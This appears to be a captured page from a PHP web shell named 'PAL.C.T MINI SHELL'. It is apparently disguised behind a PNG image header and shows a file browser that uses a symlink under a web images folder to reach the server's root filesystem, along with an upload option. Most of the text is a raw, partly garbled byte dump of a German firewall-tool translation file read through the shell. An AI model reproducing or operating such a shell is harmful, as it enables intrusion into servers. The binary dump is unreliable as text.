php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/de/LC_MESSAGES/
upload
files >> //var/www/html/sub/images/sym/root/usr/share/locale/de/LC_MESSAGES/system-config-firewall.mo

O
$.6e1
1D
WeH}/XO[gnw	J  	 
 [ I!1"L"5[")")"""
#?#N#-S##
#y#$ $)$>9$x$s$$$%9)%c%<~%9%%6&E&
V&d&q&	&&&&&&!&&&&('*9'd'''7'''(
(("(2(L(\(v(P) *(*.*5*9**+#+6+&J+q+v+|+++++++,	,",*,,--l.i//0	0
0)050;0iT0m0V,1E12
22	22
3/$3T4h4{4444444<4K455&6A76y66g7
w77777777788Q3828*88899999@:/:8;S:;L;E;G!<Oi<K<V=I\=$=====%>
+>9>-?>;m>B>|>i?r?
??	???????@@@-@9A@{@@@@@@@@A=QBCCC
CDQDXD`DJqDDDD
DEEEEE8FMFRF^FcFiFGGHlIJ6KKMM-NKNeN%~NpN$O8:OCsOYObPtPaP5YQdQaQXVRRRSTqUVVcZWFYOZ
UZ
cZnZovZZZ
["[2[[^\k\|\]Z]r]]] ]
]] ]^^B^iV^^^^^^^_
_f*_______``4`?!a1aaaaaaabIcc2e/e f@2fsf ff&fffg
g'gcCg2ggfhrh~hhh	hhhiipjUkakukpk/l0mNm=^m-m2mmnnS0nn.nn
nnpo	ooDo	ovo
fpqppVp!q@'qGhqq>q
rr
3rAr_rhrlrrrr+rrrr-s/9s!isssAstt
.t9t
LtWtkttt'tu	vvwwwwwx4x0Rxxx	xxxx xx	yy	2y<y@y")z-Lzaz{|~}/~O~[~d~q~}~"~o~i
&ˁ
#$y3Ń߃#/5Sh5tm@̅O
]jrڇ$=@p\6͈49AC
P^pYxOҋY"i|T];ag`cVĎQ.mɏ,܏	+/JIzĐ	JT
t
		ˑ Ց$@5v&Вʓ 
5@Zw
ƗԗŘ!٘40ejv{E	+5>&eDH-=v!0֢%*Al#Obfkɤ5n`AϦxfI8ì~`fpǰ8
LWx_!ر*Dز̳ki~#5
Yd l	Gd	"
̶fڶ Ab"ŷոHU96$ƹʼgI4TID-R@
DY`'zAH}
G[J35*VG	?6m>1>WZ8/lu~
bUq2?.9#;4%6hBM7Qd;S%^P
p:r)!X$	N/cgiFxe2,9=_o( ('L=kt#a|E<,yK)8"A7CN\C1<BvO"]:H$+Kwj50E n*F&{sL03.&fOJM-+@!
ERROR - You must be root to run %s.%(option)s option requires %(count)s arguments%s is not a valid protocol.%s is not a valid range (start port >= end port).%s option does not take a value%s option requires an argument(modified)<b>Basic Firewall Settings</b><b>Configuration</b><b>Destination</b><b>Information</b><b>Source</b><b>User Skill Level</b><b>Your current configuration is empty, all traffic will be blocked.</b><big><b>Firewall Configuration Wizard</b></big><i>Save on stop</i> and <i>Save on restart</i> additionally save rule and chain counter.<icmp type><interface><mode><module><port>[-<port>]:<protocol><service><type>A <i>"System without network access"</i> does not need a firewall at all. This selection disables the firewall. Otherwise, choose <i>"System with network access"</i>.A firewall allows other computers to access selected services on your computer and helps to prevent unauthorized access beyond these selections. Select the services to which the firewall should allow access.A firewall protects against unauthorized network intrusions. Enabling a firewall blocks all incoming connections. Disabling a firewall allows all connections and is not recommended. AddAdd EntryAdd InterfaceAdd additional ports or port ranges, which need to be accessible for all hosts or networks.Add entries to forward ports either from one port to another on the local system or from the local system to another system. Forwarding to another system is only useful if the interface is masqueraded. Port forwarding is IPv4 only.Address '%s' is not valid.All %s devicesAllow access to necessary ports or port ranges, only.Allow access to necessary services, only.Allow all traffic on the specified deviceAmanda Backup ClientApplyApply changesAuthentication is required to read and modify firewall settingsBackBackwards compatibility, aliased to --enabledBaculaBacula ClientBacula is a network backup solution. Enable this option, if you plan to provide Bacula backup, file and storage services.Be more verboseBeginnerBeginner
ExpertBlock this ICMP type. The default is to accept all ICMP types.CancelClicking the 'Yes' button will override any existing firewall configuration. Are you sure that you want to do this?CloseConfiguration failedConfigure SELinux mode: %sConfigure SELinux type: Usually targeted or strict PolicyConfigure Service SettingsConfigure firewall but do not activate the new configurationConfigure firewall helper modules for connection trackingConfigure firewall rulesConfigure the iptables and ip6tables service settings.Conntrack HelperConverting %sCustom RulesCustom Rules FileCustomizeDNSDefault:DescriptionDesktopDesktop
ServerDestination (at least one needed)Destination UnreachableDisableDisable FirewallDisable Internet Printing Protocol (IPP)Disable Internet Protocol Security (IPsec)Disable Multicast DNS (mDNS)Disable an iptables moduleDisable firewallERROR: FirewallD is active, please use firewall-config.Echo Reply (pong)Echo Request (ping)EditEdit EntryEnableEnable FirewallEnable an iptables moduleEnable firewallEnable firewall (default)Enable this option if you want to allow remote virtual machine management with SASL authentication and encryption (digest-md5 passwords or GSSAPI/Kerberos). The libvirtd service is needed for this option to be useful.Enable this option if you want to allow remote virtual machine management with TLS encryption, x509 certificates and optional SASL authentication. The libvirtd service is needed for this option to be useful.EnabledErrorExpertFTPFTP is a protocol used for remote file transfer. If you plan to make your FTP server publicly available, enable this option. You need the vsftpd package installed for this option to be useful.Failed to remove %s.Failed to start %s.Failed to stop %s.Failed to write %s.Failed to write selinux configuration.FileFile:FilenameFirewallFirewall ConfigurationFirewall Configuration StartupFirewall Configuration WizardFirewall TableFirewall Table:Firewall authorizationFirewall:ForwardForward the port with protocol for the interface to either another local destination port (no destination address given) or to an other destination address with an optional destination port. This is IPv4 only.Forward to another portHTTP is the protocol used to serve Web pages. If you plan to make your Web server publicly available, enable this option. This option is not required for viewing pages locally or developing Web pages.HTTPS is a modified HTTP used to serve Web pages when security is important. Examples are sites that require logins like stores or web mail. This option is not required for viewing pages locally or developing Web pages. You need the httpd package installed for this option to be useful.Here you can define which services are trusted. Trusted services are accessible from all hosts and networks.Hit <i>OK</i> to apply your changes. You do not need to restart the firewall, the changes are effective as soon as they are applied.Hit enter to continue.ICMP FilterICMP TypeIMAP over SSLIP address:IPsecIPv6 has no nat support.If you clear the <i>keep configuration</i> button, the actual firewall configuration will be overwritten.If you enable local forwarding, you have to specify a port. This port has to be different to the source port.If you enable masquerading, IP forwarding will also be enabled for your IPv4 networks.If you need further firewall settings, please modify your configuration by hand, but keep in mind, that this tool is not able to load your custom configuration. If you are using this tool, all your manual changes will be lost. If you do not want to lose your manual configuration changes, leave this program without applying.IgnoreIgnore AllIgnore actual settingsInterfaceInterface '%s' is not valid.Interface:Internet Protocol Security (IPsec) incorporates security for network transmissions directly into the Internet Protocol (IP). IPsec provides methods for both encrypting data and authentication for the host or network it sends to. If you plan to use a vpnc server or FreeS/WAN, do not disable this option.Invalid argument %sKeep ConfigurationKey:List predefined services.List the supported icmp types.LoadLoad _Default ConfigurationLocal forwardingMail (SMTP)Make sure to open the destination port on the remote system.Mark all interfaces as trusted which should have full access to the system.Mark the ICMP types in the list, which should be rejected. All other ICMP types are allowed to pass the firewall. The default is no limitation.Mark the interfaces to be masqueraded.Masquerades traffic from the specified device. This is IPv4 only.MasqueradingMasquerading allows you to set up a host or router that connects your local network to the internet. Your local network will not be visible and the hosts appear as a single address on the internet. Masquerading is IPv4 only.Move Entry DownMove Entry UpMulticast DNS (mDNS)NFS4Network Printing Client (IPP)Network Printing Server (IPP)NoNo configurationNot configuredNumeric status outputOKOld firewall configuration.Only mark interfaces if you can trust all participants on that network interface.Open specific ports in the firewall (e.g, ssh:tcp)Open the firewall for a service (e.g, ssh)OpenVPNOpenVPN is a virtual private network (VPN) solution. It is used to create encrypted point-to-point tunnels between computers. If you plan to provide a VPN service, enable this option.Other PortsPOP-3 over SSLParameter ProblemParse error in config filePlease answer the questions in the following configuration steps. The wizard leads you back to the main application and hides all unnecessary configuration options.Please check your firewall settings after applying custom rules.Please enter a port or port range and protocol.Please enter a valid port number, service name or range.Please load a default configuration from the <i>Options</i> menu or use the wizard.Please remember to check if the services iptables and ip6tables are enabled.Please remember to check your firewall configuration before using it.Please select an entry from the list or enter a interface further down.Please select an entry from the list or enter a port and protocol further down.Please select keep configuration or choose to load a default configuration.Please select the protocol type, the firewall table and the file containing the rules.Please select the source and destination options according to your needs.Please specify your firewall skills.PortPort / Port Range:Port ForwardingPort and ProtocolPort or port range '%s' is not valid.Port/ProtocolPort:Predefined Services with Default Environment:Print a counter/number for every rule in the status output.Print addresses and ports in numeric format for the status output.Print information about the number of packets and bytes plus the <i>input-</i> and <i>outputdevice</i> in the status output.ProtocolProtocol '%s' is not valid.Protocol TypeProtocol Type:Protocol:QuitRADIUSRed Hat Cluster SuiteRedirectReloadReload current configurationRemoveRemove EntryRouter AdvertisementRouter SolicitationRun noninteractively; process only command-line argumentsSELinux Options (deprecated)SSHSambaSamba ClientSave and restore counterSave on restartSave on stopSave the active firewall configuration with all changes since the last start before restarting the firewall. Only do this if you need to preserve the active state for the next start.Save the active firewall configuration with all changes since the last start before stopping the firewall. Only do this if you need to preserve the active state for the next start.Secure Shell (SSH) is a protocol for logging into and executing commands on remote machines. It provides secure encrypted communications. If you plan on accessing your machine remotely via SSH over a firewalled interface, enable this option. You need the openssh-server package installed for this option to be useful.Secure WWW (HTTPS)SelectSelect <i>"Expert"</i> if you are familiar with firewall configurations or if you need to add user customized rules. Otherwise, choose <i>"Beginner"</i>.Select a FileServerServiceService SettingsSet firewall default type: %s. This overwrites any existing configuration.Show this help messageShow versionSource (all needed)Source QuenchSpecify a custom rules file for inclusion in the firewall, after the default rules. Default protocol type: ipv4, default table: filter. (Example: ipv4:filter:/etc/sysconfig/ipv4_filter_addon)Start WizardStart configuration wizardStatus line numbersSupported icmp types:System without network access
System with network accessTFTPTFTP ClientTODOTableThe Amanda backup client option allows you to connect to a Amanda backup and archiving server. You need the amanda-client package installed for this option to be useful.The Domain Name System (DNS) is used to provide and request host and domain names. Enable this option, if you plan to provide a domain name service (e.g. with bind).The Internet Message Access Protocol over SSL (IMAPs) allows a local client to access email on a remote server in a secure way. If you plan to provide a IMAP over SSL service (e.g. with dovecot), enable this option.The Internet Printing Protocol (IPP) is used for distributed printing. IPP (over tcp) provides the ability to share printers over the network. Enable this option if you plan to share printers via cups over the network.The Internet Printing Protocol (IPP) is used for distributed printing. IPP (over udp) provides the ability to get information about a printer (e.g. capability and status) and to control printer jobs. If you plan to use a remote network printer via cups, do not disable this option.The NFS4 protocol is used to share files via TCP networking. You will need to have the NFS tools installed and properly configure your NFS server for this option to be useful.The Post Office Protocol version 3 (POP3) is a protocol to retrieve email from a remote server over a TCP/IP connection. Enable this option, if you plan to provide a POP3 service (e.g. with dovecot).The Remote Authentication Dial In User Service (RADIUS) is a protocol for user authentication over networks. It is mostly used for modem, DSL or wireless user authentication. If you plan to provide a RADIUS service (e.g. with freeradius), enable this option.The Trivial File Transfer Protocol (TFTP) is a protocol used to transfer files to and from a remote machine in s simple way. It is normally used only for booting diskless workstations and also to transfer data in the Preboot eXecution Environment (PXE).The file '%s' does not exist.The firewall configuration is not consistent.The firewall is disabled.The firewall is enabled.The firewall table '%s' is not valid.The following files are missing or unusable:
	%s

Apply your firewall configuration now to correct this problem.The protocol type '%s' is not valid.There are unapplied changes, do you really want to quit?This error message informs a host to send packets on another route.This error message is generated by a host or gateway if the destination is not reachable.This error message is generated if the IP header is bad, either by a missing option or bad length.This error message is generated if the time-to-live was exceeded either of a packet or of the reassembling of a fragmented packet.This error message is generated to tell a host to reduce the pace at which it is sending packets.This message is the answer to an <i>Echo Request</i>.This message is used by a host attached to a multicast link to request a <i>Router Advertisement</i>This message is used by routers to periodically announce the IP address of a multicast interface.This message is used to test if a host is reachable mostly with the <i>ping</i> utility.This option allows a Bacula server to connect to the local machine to schedule backups. You need the bacula-client package installed for this option to be useful.This option allows incoming SMTP mail delivery. If you need to allow remote hosts to connect directly to your machine to deliver mail, enable this option. You do not need to enable this if you collect your mail from your ISP's server by POP3 or IMAP, or if you use a tool such as fetchmail. Note that an improperly configured SMTP server can allow remote machines to use your server to send spam.This option allows you to access Trivial File Transfer Protocol (TFTP) servers. You need the tftp package installed for this option to be useful.This option allows you to access Windows file and printer sharing networks. You need the samba-client package installed for this option to be useful.This option allows you to access and participate in Windows file and printer sharing networks. You need the samba package installed for this option to be useful.This option allows you to use the Red Hat Cluster Suite. Ports are opened for openais, ricci and dlm. You need the Red Hat Cluster Suite installed for this option to be useful.This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program.  If not, see <http://www.gnu.org/licenses/>.This program will help you to set up a basic firewall for your system.This wizard helps you to set up a clean firewall configuration for your system.Time ExceededTo AddressTo PortTo ensure a sane state, the kernel firewall modules must be unloaded when the firewall is restarted or stopped.Trusted InterfacesTrusted ServicesTypeUnload modules on restart and stopUpdate firewall non-interactively if the firewall is enabled. This will also restart the firewall. The -n and -f options will be ignored.Use custom rules files to add additional rules to the firewall. The custom rules are added after the default rules. The files must have the iptables-save format.User DefinedUser Skill LevelUsing these options with no additional firewall options will not create or alter firewall configuration, only SELinux will be configured.Valid values: %sValid values: <port>[-<port>], where port is either a number [0..65535] or a service name.Valid values: tcp, udpVerbose statusVirtual Machine ManagementVirtual Machine Management (TLS)WWW (HTTP)WarningWhat kind of system do you have?WizardYesYou can change the settings in the <i>Options</i> menu afterwards.Your firewall configuration was converted from an old version. Please verify the configuration and apply.[<type>:][<table>:]<filename>_About_File_Help_Options_Quit_Start Configuration Wizardconfigurationif=<interface>:port=<port>:proto=<protocol>[:toport=<destination port>][:toaddr=<destination address>]invalid interface '%s'.invalid port definition %s.invalid service '%s'.ipv6 has no nat support.localmDNS provides the ability to use DNS programming interfaces, packet formats and operating semantics in a small network without a conventional DNS server. If you plan to use Avahi, do not disable this option.modified labelno such option: %soption %(option)s: invalid forward_port '%(value)s'.option %(option)s: invalid forward_port '%(value)s': %(error)s.option %(option)s: invalid icmp type '%(value)s'.port range %s is not unique.system-config-firewalltranslator-creditsyesFirewall ConfigurationyesMark the ICMP types in the list, which should be rejected. All other ICMP types are allowed to pass the firewall. The default is no limitation.yesThe Internet Control Message Protocol (ICMP) is mainly used to send error messages between networked computers, but additionally for informational messages like ping requests and replies.yesUse custom rules files to add additional rules to the firewall. The custom rules are added after the default rules. The files must have the iptables-save format.Project-Id-Version: system-config-firewall
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2011-02-16 16:32+0200
PO-Revision-Date: 2013-11-20 09:28+0000
Last-Translator: Roman Spirgi <bigant@fedoraproject.org>
Language-Team: German (http://www.transifex.com/projects/p/system-config-firewall/language/de/)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: de
Plural-Forms: nplurals=2; plural=(n != 1);

FEHLER - Sie müssen Root sein, um %s zu starten.Option %(option)s benötigt %(count)s Argumente%s ist kein gültiges Protokoll.%s ist kein gültiger Port-Bereich (Anfangs- Port >= Ende-Port).%s Option erhielt keinen Wert%s Option benötigt ein Argument(geändert)<b>Grundeinstellungen der Firewall</b><b>Konfiguration</b><b>Ziel</b><b>Information</b><b>Quelle</b><b>Benutzerfähigkeiten</b><b>Die aktuelle Konfiguration ist enthält keine Einträge; alle Verbindungen werden blockiert.</b><big><b>Firewall-Konfigurationsassistent</b></big>Bei Verwendung von <i>Beim Anhalten speichern</i> und <i>Bei Neustart speichern</i> werden auch die Regel- und Kettenzähler abgespeichert.<icmp type><interface><mode><module><port>[-<port>]:<protocol><service><type>Ein <i>"System ohne Netzwerkzugang"</i> benötigt überhaupt keine Firewall. Diese Auswahl deaktiviert die Firewall. Wählen Sie ansonsten <i>"System mit Netzwerkzugang"</i>.Eine Firewall erlaubt anderen Rechnern den Zugriff auf ausgewählte Dienste Ihres Rechners und hilft bei der Verhinderung von unberechtigtem Zugriff, welche über die Auswahl hinausgeht. Wählen Sie die Dienste aus, auf welche die Firewall Zugriff erlauben soll.Eine Firewall schützt vor unautorisiertem Eindringen über das Netzwerk. Das Aktivieren einer Firewall blockiert alle eingehenden Verbindungen. Das Deaktivieren einer Firewall erlaubt alle Verbindungen und wird nicht empfohlen.HinzufügenEintrag hinzufügenSchnittstelle hinzufügenZusätzliche Ports oder Port-Bereiche hinzufügen, die für alle Rechner oder Netzwerke erreichbar sein müssen.Fügen Sie Einträge hinzu, um entweder einen Port auf einen anderen lokalen Port weiterzuleiten oder vom lokalen System auf ein anderes. Das Weiterleiten eines Ports auf ein anderes System ist nur dann sinnvoll, wenn die Schnittstelle maskiert ist. Port-Weiterleitung kann nur für IPv4 benutzt werden.Adresse »%s« ist ungültig.Alle %s-GeräteZugriff nur auf benötigte Ports oder Port-Bereiche erlauben.Zugriff nur für benötigte Dienste erlauben.Gesamten Verkehr auf dem angegeben Gerät erlaubenAmanda Backup ClientAnwendenÄnderungen anwendenAuthentifizierung wird benötigt, um Firewall-Einstellungen zu lesen und zu ändernZurückRückwärtskompatibilität, Alias zu --enabledBaculaBacula-ClientBacula ist eine Datensicherungslösung via Netzwerk. Aktivieren Sie diese Option, falls Sie planen, Backup-, Datei- und Speicher-Dienste via Bacula anzubieten.Ausführlicher seinAnfängerAnfänger
ExperteDiesen ICMP-Typ blockieren. Der Standard akzeptiert alle ICMP-Typen.AbbrechenWenn Sie auf »Ja« klicken, wird jede existierende Firewall-Konfiguration überschrieben. Möchten Sie dies wirklich?SchließenKonfiguration fehlgeschlagenSELinux-Modus konfigurieren: %sKonfiguration des SELinux-Typs: Normalerweise »targeted«- oder »strict«-RichtlinieDiensteinstellungen konfigurierenFirewall konfigurieren, aber neue Konfiguration nicht aktivierenFirewall-Hilfsmodule zum Zurückverfolgen von Verbindungen hinzufügen.Firewall-Regeln konfigurierenKonfiguration der iptables- and ip6tables-Diensteinstellungen.Conntrack Helper%s wird konvertiert Eigene RegelnEigene Regeldatei hinzufügenAnpassenDNSStandardeinstellung: BeschreibungDesktopDesktop
ServerZiel (zumindest ein Eintrag wird benötigt)Ziel nicht erreichbarDeaktivierenFirewall deaktivierenInternet Printing Protocol (IPP) deaktivierenInternet Protocol Security (IPsec) deaktivierenMulticast DNS (mDNS) deaktivierenEin iptables-Modul deaktivierenFirewall deaktivierenFEHLER: FirewallD ist aktiv, verwenden Sie bitte firewall-config.Echo-Anwort (pong)Echo-Anforderung (ping)BearbeitenEintrag bearbeitenAktivierenFirewall aktivierenEin iptables-Modul aktivierenFirewall aktivierenFirewall aktivieren (Vorgabe)Aktivieren Sie diese Option, wenn Sie das Verwalten von virtuellen Maschinen von Remote aus mit SASL-Authentifizierung und Verschlüsselung (digest-md5 Passwörtern oder GSSAPI/Kerberos) ermöglichen möchten. Der libvirtd-Dienst wird für den ordnungsgemäßen Gebrauch dieser Option benötigt.Aktivieren Sie diese Option, wenn Sie die Fernverwalten von virtuellen Maschinen mit TLS-Verschlüsselung, x509-Zertifikaten und optionaler SASL-Authentifizierung ermöglichen möchten. Der libvirtd-Dienst wird für den ordnungsgemäßen Gebrauch dieser Option benötigt.AktiviertFehlerExperteFTPDas FTP-Protokoll wird zur Übertragung von Dateien zwischen Rechnern verwendet. Wenn Sie einen FTP-Server betreiben möchten, aktivieren Sie bitte diese Option. Außerdem benötigen Sie das Paket »vsftpd«.Fehler beim Löschen von %s.Start von %s gescheitert.Beenden von %s gescheitert.Fehler beim Schreiben von %s.Fehler beim Schreiben der SELinux-Konfiguration.DateiDatei:DateinameFirewallFirewall-KonfigurationFirewall-KonfigurationsstartFirewall-KonfigurationsassistentFirewall-TabelleFirewall-Tabelle:Firewall-AutorisierungFirewall:VorDen Port mit dem Protokoll für die Schnittstelle entweder an einen anderen lokalen Port (keine Zieladresse angegeben) oder an an eine andere Zieladresse mit einem optionalen Zielport weiterleiten. Kann nur für IPv4 benutzt werden.An einen anderen Port weiterleitenMit Hilfe des HTTP-Protokolls werden Webseiten zur Verfügung gestellt. Wenn Sie einen Web-Server betreiben möchten, aktivieren Sie bitte diese Option. Es ist nicht notwendig, diese Option zu aktivieren, wenn Sie Webseiten nur lokal ansehen möchten oder wenn Sie Webseiten lokal entwickeln möchten.HTTPS ist eine Erweiterung von HTTP zur Übertragung von Webseiten, bei denen es auf Sicherheit ankommt. Beispiele sind Seiten die eine Anmeldung erfordern, wie etwa Web-Mail. Diese Option ist nicht notwendig zum Betrachten von lokalen Seiten oder zum Erstellen von Web-Seiten. Zum Betrieb eines Web-Servers wird außerdem das Paket »httpd« benötigt.Hier können Sie einstellen, welche Dienste als vertrauenswürdig eingestuft sind. Vertrauenswürdige Dienste sind von allen Rechnern oder Netzwerken erreichbar.Klicken Sie auf <i>OK</i>, um Ihre Änderungen anzuwenden. Sie müssen die Firewall nicht neu starten, die Änderungen sind aktiv, sobald sie angewendet wurden.Drücken Sie die Eingabetaste, um fortzufahren.ICMP-FilterICMP-TypIMAP via SSLIP-Adresse:IPsecipv6 hat keine NAT-Unterstützung.Wenn Sie die Auswahl <i>Konfiguration beibehalten</i> aufheben, wird die aktuelle Konfiguration überschrieben.Wenn Sie lokales Weiterleiten aktivieren, müssen Sie einen Port angeben. Dieser Port darf nicht mit dem Quell-Port übereinstimmen.Wenn Sie Masquerading aktivieren, wird die IP-Weiterleitung ebenfalls für Ihre IPv4-Netzwerke aktiviert.Falls Sie weitere Firewall-Einstellungen benötigen, passen Sie Ihre Konfiguration bitte per Hand an, bedenken dabei jedoch, dass dieses Werkzeug nicht in der Lage ist, Ihre angepasste Konfiguration zu laden. Wenn Sie dieses Werkzeug verwenden, werden alle Ihre manuellen Änderungen gelöscht. Falls Sie Ihre manuellen Konfigurationsänderungen nicht verlieren möchten, beenden Sie das Programm, ohne Änderungen anzuwenden.IgnorierenAlle ignorierenTatsächliche Einstellungen ignorierenSchnittstelleSchnittstelle »%s« ist ungültig.Schnittstelle:Internet Protocol Security (IPsec) bindet die Sicherheit für Netzwerkübertragungen direkt in das Internet Protocol (IP) ein. IPSec liefert Methoden sowohl für die Verschlüsselung von Daten als auch für die Authentifizierung mit dem Host oder Netzwerk, an das es schickt. Falls Sie planen, einen VPNC-Server oder FreeS/WAN zu verwenden, deaktivieren Sie diese Option nicht.Ungültiges Argument %sKonfiguration beibehaltenSchlüssel:Vordefinierte Dienste anzeigen.Liste der unterstützen ICMP-Typen.LadenStan_dard-Konfiguration ladenLokale WeiterleitungMail (SMTP)Denken Sie daran, den Port im Ziel-System zu öffnen.Alle Schnittstellen, die vollständigen Zugriff auf das System haben sollen, als vertrauenswürdig markieren.Markieren Sie die ICMP-Typen in der Liste, die verworfen werden sollen. Alle anderen ICMP-Typen haben die Erlaubnis, die Firewall zu passieren. Der Standard hat keine Limitierung.Markieren Sie die für Masquerading vorgesehenen Schnittstellen.Maskiert Verkehr auf dem angegebenen Gerät. Kann nur für IPv4 benutzt werden.MasqueradingMasquerading erlaubt es, einen Rechner oder Router einzurichten, der Ihr lokales Netzwerk mit dem Internet verbindet. Ihr lokales Netzwerk ist nicht sichtbar und erscheint als ein Recher vom Internet aus betrachtet. Masquerading kann nur für IPv4 benutzt werden.Eintrag hinunterschiebenEintrag hinaufschiebenMulticast DNS (mDNS)NFS4Network Printing Client (IPP)Network Printing Server (IPP)NeinKeine KonfigurationNicht konfiguriertNumerische StatusausgabeOKAlte Firewall-KonfigurationNur Schnittstellen markieren, bei denen allen Teilnehmern an dieser Netzwerk-Schnittstelle vertraut werden kann.Bestimmte Ports in der Firewall öffnen (z.B. ssh:tcp)Bestimmte Dienste in der Firewall öffnen (z.B. ssh)OpenVPNOpenVPN ist ein Programm für virtuelle, private Netzwerke (virtual private network; VPN). Damit können Sie verschlüsselte Punkt-zu-Punkt-Verbindungen zwischen Rechnern herstellen. Wenn Sie eine VPN-Funktion anbieten möchten, aktivieren Sie diese Option.Andere PortsPOP-3 via SSLParameter-ProblemKonfigurationsdatei fehlerhaftBitte beantworten Sie die Fragen in den nächsten Konfigurationsschritten. Der Assistent führt Sie anschließend zurück zur Hauptanwendung und blendet alle Konfigurationsoptionen aus, die für Ihre Einrichtung nicht relevant sind.Bitte überprüfen Sie Ihre Firewall-Einstellungen nach der Anwendung von eigenen Regeln.Bitte geben Sie eine gültige Portnummer, Namen eines Dienstes oder Bereich an.Bitte geben Sie eine gültige Portnummer, den Namen eines Dienstes oder einen Bereich an.Bitte laden Sie eine Standardkonfiguration im <i>Optionen</i>-Menü aus oder starten Sie die Assistenten.Bitte vergewissern Sie sich, dass die Dienste iptables und ip6tables aktiviert sind.Bitte denken Sie daran, Ihre Firewall-Konfiguration zu überprüfen, bevor Sie sie verwenden.Bitte wählen Sie einen Eintrag aus der Liste oder geben Sie eine Schnittstelle weiter unten ein.Bitte wählen Sie einen Eintrag aus der Liste oder geben Sie einen Port und Protokoll weiter unten ein.Bitte wählen Sie »Konfiguration beibehalten« oder wählen Sie eine Standardkonfiguration aus.Bitte wählen Sie den Protokolltyp, die Firewall-Tabelle und die Datei mit den Regeln.Bitte wählen Sie die Quell- und Ziel-Einstellungen nach Ihren Bedürfnissen aus.Bitte geben Sie Ihre Firewall-Fähigkeiten an.PortPort / Port-Bereich:Port-WeiterleitungPort und ProtokollPort oder Port-Bereich »%s« ist ungültig.Port/ProtokollPort:Vordefinierte Dienste mit Standardumgebung:Zähler für alle Regeln in der Status-Ausgabe.Adressen und Ports in numerischem Format für die Statusausgabe ausgeben.Informationen über die Anzahl der Pakete und Bytes mit den <i>Ein-</i> und <i>Ausgabegeräten</i> im ausführlichen Status ausgeben.ProtokollProtokoll »%s« ist ungültig.Protokoll-TypProtokoll-Typ:Protokoll:BeendenRADIUSRed Hat Cluster SuiteUmleitungNeu ladenAktuelle Konfiguration neu ladenLöschenEintrag löschenRouter-AnkündigungRouter-BewerbungNicht-interaktiv starten, nur Befehlszeilen-Argumente abarbeitenSELinux-Optionen (veraltet)SSHSambaSamba-ClientZähler speichern und wiederherstellenBei Neustart speichernBeim Anhalten speichernDie aktuelle Firewall-Konfiguration mit allen seit dem Start gemachten Änderungen vor dem Neustart speichern. Bitte nur aktivieren, wenn der aktuelle Zustand beim nächsten Start wieder benötigt wird.Die aktuelle Firewall-Konfiguration mit allen seit dem Start gemachten Änderungen speichern. Bitte nur aktivieren, wenn der aktuelle Zustand beim nächsten Start wieder benötigt wird.Secure Shell (SSH) ist ein Protokoll, mit dem man sich auf entfernten Rechnern anmelden und Befehle ausführen kann. Die Kommunikation erfolgt dabei verschlüsselt. Wenn Sie auf Ihren Rechner aus der Ferne mit SSH über eine Netzwerkschnittstelle mit aktivierter Firewall zugreifen möchten, aktivieren Sie bitte diese Option. Das Paket »openssh-server« muss installiert sein, damit diese Option sinnvoll ist.Sicheres WWW (HTTPS)AuswählenWählen Sie <i>"Experte"</i>, wenn Sie mit Firewall-Konfigurationen vertraut sind oder eigene Regeln hinzufügen müssen. Ansonsten wählen Sie <i>"Anfänger"</i>.Eine Datei auswählenServerDienstDiensteinstellungenDen Standard-Firewall-Typ festlegen: %s. Die bestehende Konfiguration wird überschrieben.Diese Hilfe-Nachricht anzeigenVersion anzeigenQuelle (alle werden benötigt)Source QuenchWählen Sie eine eigene Regeldatei aus, die in die Firewall eingebunden werden soll. Sie wird nach den Standardregeln eingebunden. Standardprotokolltyp: ipv4, Standardtabelle: filter. (Beispiel: ipv4:filter:/etc/sysconfig/ipv4_filter_addon)Assistenten startenKonfigurationsassistenten startenNummerierte Status-AusgabeUnterstützte ICMP-Typen:System ohne Netzwerkzugang
System mit NetzwerkzugangTFTPTFTP-ClientTODOTabelleDer Amanda Backup Client ermöglicht es, auf einen Amanda Backup- und Archivierungs-Server zuzugreifen. Um diese Optionen zu ermöglichen, müssen Sie das Paket amanda-client installiert haben.Das Domain Name System (DNS) wird verwendet, um Rechner- und Domainnamen zur Verfügung zu stellen und abzufragen. Aktivieren Sie diese Option, wenn Sie planen, einen Domain Name Service (z.B. mit bind) zur Verfügung zu stellen.Das Internet Message Access Protocol via SSL (IMAPS) ermöglicht einem lokalen Client den sicheren Zugriff auf E-Mail auf einem entfernten Server. Falls Sie planen, einen IMAP-via-SSL-Dienst zur Verfügung zu stellen (z.B. mit dovecot), aktivieren Sie diese Option.Das Internet Printing Protocol (IPP) wird für gemeinsames Drucken verwendet. Es ermöglicht (über tcp) Drucker im Netzwerk freizugeben. Falls Sie planen, einen Drucker via cups im Netzwerk freizugeben, deaktivieren Sie diese Option nicht.Das Internet Printing Protocol (IPP) wird für gemeinsames Drucken verwendet. Es ermöglicht (über udp) Informationen über einen Drucker zu bekommen (z.B. Fähigkeiten und Status) und Druckaufträge zu kontrollieren. Falls Sie planen, einen Netzwerkdrucker via cups zu verwenden, deaktivieren Sie diese Option nicht.Dies gestattet Ihnen, das NFS-Protokoll, Version 4 via TCP zu verwenden, um Dateien auszutauschen. Sie müssen die NFS-Werkzeuge installiert haben und den NFS-Server korrekt konfigurieren, damit diese Option nützlich ist.Das Post Office Protocol Version 3 (POP3) ist ein Protokoll zum Abruf von E-Mail von einem entfernten Server via einer TCP/IP-Verbindung. Aktivieren Sie diese Option, wenn Sie planen, einen POP3-Dienst (z.B. mit dovecot) anzubieten.Der Remote Authentication Dial In User Service (RADIUS) ist ein Protokoll für die Benutzerauthentifizierung via Netzwerk. Es wird überwiegend für Modem-, DSL- oder Wireless-Benutzerauthentifizierung verwendet. Falls Sie planen, einen RADIUS-Dienst zur Verfügung zu stellen 